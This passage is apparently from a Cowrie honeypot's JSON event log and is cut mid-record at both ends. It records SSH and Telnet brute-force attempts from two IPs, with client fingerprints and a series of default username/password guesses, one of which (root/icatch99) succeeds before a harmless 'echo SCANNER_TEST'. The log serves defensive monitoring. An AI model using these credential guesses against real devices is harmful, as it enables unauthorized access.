bc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:19:54.507498Z","src_ip":"212.227.235.229","session":"9924206744b3"}
{"eventid":"cowrie.login.failed","username":"help","password":"1234","message":"login attempt [help/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:19:55.469351Z","src_ip":"212.227.235.229","session":"9924206744b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38018,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dbd8b4746e4","protocol":"ssh","message":"New connection: 212.227.235.229:38018 (1.2.3.4:22) [session: 3dbd8b4746e4]","sensor":"my-vps","timestamp":"2025-08-26T21:19:56.826469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:19:56.932987Z","src_ip":"212.227.235.229","session":"3dbd8b4746e4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:19:57.080143Z","src_ip":"212.227.235.229","session":"3dbd8b4746e4"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:19:57.162919Z","src_ip":"212.227.235.229","session":"9924206744b3"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt123","message":"login attempt [ubnt/ubnt123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:19:58.501997Z","src_ip":"212.227.235.229","session":"3dbd8b4746e4"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:19:59.757185Z","src_ip":"212.227.235.229","session":"3dbd8b4746e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57358,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee43caa7c1fc","protocol":"ssh","message":"New connection: 212.227.235.229:57358 (1.2.3.4:22) [session: ee43caa7c1fc]","sensor":"my-vps","timestamp":"2025-08-26T21:20:01.191343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:20:01.192924Z","src_ip":"212.227.235.229","session":"ee43caa7c1fc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:20:01.461282Z","src_ip":"212.227.235.229","session":"ee43caa7c1fc"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-26T21:20:02.684667Z","src_ip":"212.227.235.229","session":"ee43caa7c1fc"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:04.762267Z","src_ip":"212.227.235.229","session":"ee43caa7c1fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43662,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d52d9479843","protocol":"ssh","message":"New connection: 212.227.235.229:43662 (1.2.3.4:22) [session: 9d52d9479843]","sensor":"my-vps","timestamp":"2025-08-26T21:20:11.500218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:20:11.597199Z","src_ip":"212.227.235.229","session":"9d52d9479843"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:20:11.935061Z","src_ip":"212.227.235.229","session":"9d52d9479843"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T21:20:13.497945Z","src_ip":"212.227.235.229","session":"9d52d9479843"}
{"eventid":"cowrie.session.connect","src_ip":"209.38.25.40","src_port":44098,"dst_ip":"1.2.3.4","dst_port":23,"session":"25e632524603","protocol":"telnet","message":"New connection: 209.38.25.40:44098 (1.2.3.4:23) [session: 25e632524603]","sensor":"my-vps","timestamp":"2025-08-26T21:20:13.857319Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T21:20:14.485715Z","src_ip":"209.38.25.40","session":"25e632524603"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:15.006971Z","src_ip":"212.227.235.229","session":"9d52d9479843"}
{"eventid":"cowrie.session.closed","duration":3.6857757568359375,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:17.543011Z","src_ip":"209.38.25.40","session":"25e632524603"}
{"eventid":"cowrie.session.connect","src_ip":"209.38.25.40","src_port":44106,"dst_ip":"1.2.3.4","dst_port":23,"session":"6f06237b8d31","protocol":"telnet","message":"New connection: 209.38.25.40:44106 (1.2.3.4:23) [session: 6f06237b8d31]","sensor":"my-vps","timestamp":"2025-08-26T21:20:17.822023Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41954,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c311ecbe05a","protocol":"ssh","message":"New connection: 212.227.235.229:41954 (1.2.3.4:22) [session: 6c311ecbe05a]","sensor":"my-vps","timestamp":"2025-08-26T21:20:22.713685Z"}
{"eventid":"cowrie.session.closed","duration":4.930590867996216,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:22.752540Z","src_ip":"209.38.25.40","session":"6f06237b8d31"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:20:22.901548Z","src_ip":"212.227.235.229","session":"6c311ecbe05a"}
{"eventid":"cowrie.session.connect","src_ip":"209.38.25.40","src_port":51644,"dst_ip":"1.2.3.4","dst_port":23,"session":"de5210863494","protocol":"telnet","message":"New connection: 209.38.25.40:51644 (1.2.3.4:23) [session: de5210863494]","sensor":"my-vps","timestamp":"2025-08-26T21:20:23.027547Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:20:23.666218Z","src_ip":"209.38.25.40","session":"de5210863494"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:20:23.743559Z","src_ip":"209.38.25.40","session":"de5210863494"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:20:24.034060Z","src_ip":"212.227.235.229","session":"6c311ecbe05a"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T21:20:24.070653Z","src_ip":"209.38.25.40","session":"de5210863494"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:25.345422Z","src_ip":"209.38.25.40","session":"de5210863494"}
{"eventid":"cowrie.session.closed","duration":2.3231208324432373,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:25.350585Z","src_ip":"209.38.25.40","session":"de5210863494"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-26T21:20:25.765418Z","src_ip":"212.227.235.229","session":"6c311ecbe05a"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:20:27.659987Z","src_ip":"212.227.235.229","session":"6c311ecbe05a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46486,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6527eb73fa9","protocol":"ssh","message":"New connection: 212.227.235.229:46486 (1.2.3.4:22) [session: c6527eb73fa9]","sensor":"my-vps","timestamp":"2025-08-26T21:20:35.319578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:20:35.823378Z","src_ip":"212.227.235.229","session":"c6527eb73fa9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:20:35.824065Z","src_ip":"212.227.235.229","session":"c6527eb73fa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33768,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1d201048369","protocol":"ssh","message":"New connection: 212.227.235.229:33768 (1.2.3.4:22) [session: f1d201048369]","sensor":"my-vps","timestamp":"2025-08-26T21:20:37.807628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:20:40.038597Z","src_ip":"212.227.235.229","session":"f1d201048369"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","e